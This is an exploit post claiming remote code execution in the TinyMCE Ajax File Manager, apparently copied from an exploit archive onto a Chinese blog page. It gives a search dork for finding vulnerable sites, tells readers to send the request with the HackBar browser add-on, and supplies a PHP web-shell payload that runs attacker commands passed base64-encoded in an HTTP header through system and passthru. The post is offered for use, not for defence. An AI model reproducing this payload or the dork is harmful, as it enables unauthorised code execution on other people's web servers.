TinyMCE Ajax File Manager suffers from a remote code execution vulnerability.

 ____   ____   ____   _______/  |________   ____   ____ 
 /  _ \ /    \_/ __ \ /  ___/\   __\_  __ \_/ __ \_/ __ \
(  <_> )   |  \  ___/ \___ \  |  |  |  | \/\  ___/\  ___/
 \____/|___|  /\___  >____  > |_ |  |__|    \___  >\___  >
            \/     \/     \/                    \/     \/
      
 
# Exploit Title : timynce Ajax File Manager Remote Code 
# Author        : By onestree
# Software Link : http://www.phpletter.com/Demo/Tinymce-Ajax-File-Manager/
# tested        : windows 7
# Dork          : inurl:"/plugins/filemanager/" or inurl:'/timynce/plugins/"
 
 
*************************************************************
 
how to run the exploit use firefox web browser
and download firefox add ons HackBar

exploit : 

foo=<?php error_reporting(0);print(system('onestree'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>

 ====================================================================

tutorial video 
https://www.youtube.com/watch?v=ahli-dehYWY


Thanks :
 
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
      
          indonesiancoder - moeslimh4x0r - go-coder
 
spesial my hunny ( Fheby Yahya) :* muaaah
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值